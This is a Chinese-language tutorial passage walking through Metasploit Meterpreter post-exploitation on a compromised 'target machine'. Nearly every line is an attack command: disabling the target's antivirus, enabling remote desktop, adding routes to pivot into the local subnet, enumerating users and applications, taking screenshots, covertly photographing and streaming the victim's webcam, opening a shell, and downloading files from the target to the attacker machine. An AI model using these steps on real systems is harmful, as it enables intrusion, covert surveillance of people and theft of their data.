获得了稳定的进程后,接下来收集系统信息。
输入 sysinfo 命令(查看目标机的系统信息):
输入 run post/windows/gather/checkvm 命令(检查目标机是否运行在虚拟机上):
我这里不是在虚拟机上的,如果在虚拟机上会显示(this is a wmware virtual machine)
输入 idletime 命令 (可以看见目标机最近运行的时间):
输入 route 命令 (查看目标机完整的网络设置):
输入background 命令将当前会话放在后台,还可以输入 setuid 命令查看目标机上已经渗透成功的用户名:
输入 run post/windows/manage/killav 命令(关闭目标机系统杀毒软件):
输入 run post/windows/manage/enable_rdp 命令(启动目标机的远程桌面协议,也就是常说的3389端口):
输入 run post/windows/manage/autoroute 命令(查看目标机本地子网情况)
输入 route add 命令添加路由,添加成功后输入 route print 命令查看
输入 run post/windows/gather/enum_logged_on_users 命令(列举有多少用户登陆了目标机)
输入 run post/windows/gather/enum_applications 命令(列举安装在目标机上的应用程序)
输入 screenshot 命令(可以抓取到目标机的屏幕截图)
输入 webcam_list 命令(查看目标机有没有摄像头)
输入 webcam_snap 命令(打开目标机的摄像头,拍摄一张照片)
输入 webcam_stream 命令(开启直播模式)
输入 shell 命令(进入目标机shell下面),exit 命令停止shell会话并返回meterpreter。
输入 pwd 命令(查看当前处于目标机哪个目录)
输入 getlwd 命令 (查看当前处于本地的哪个目录)
输入 search -f* .txt -d c:\ 命令(表示在c盘下搜索所有".txt"为拓展名的文件,-f参数表示指定搜索文件模式,-d参数指定在哪一个目录下进行搜索)
输入 download c:\test.txt/root 命令(下载目标机上的test.txt文件到攻击机root下)
输入 upload /root/test.txt c:\ 命令(上传攻击机上的test.txt文件到目标机上的c盘下)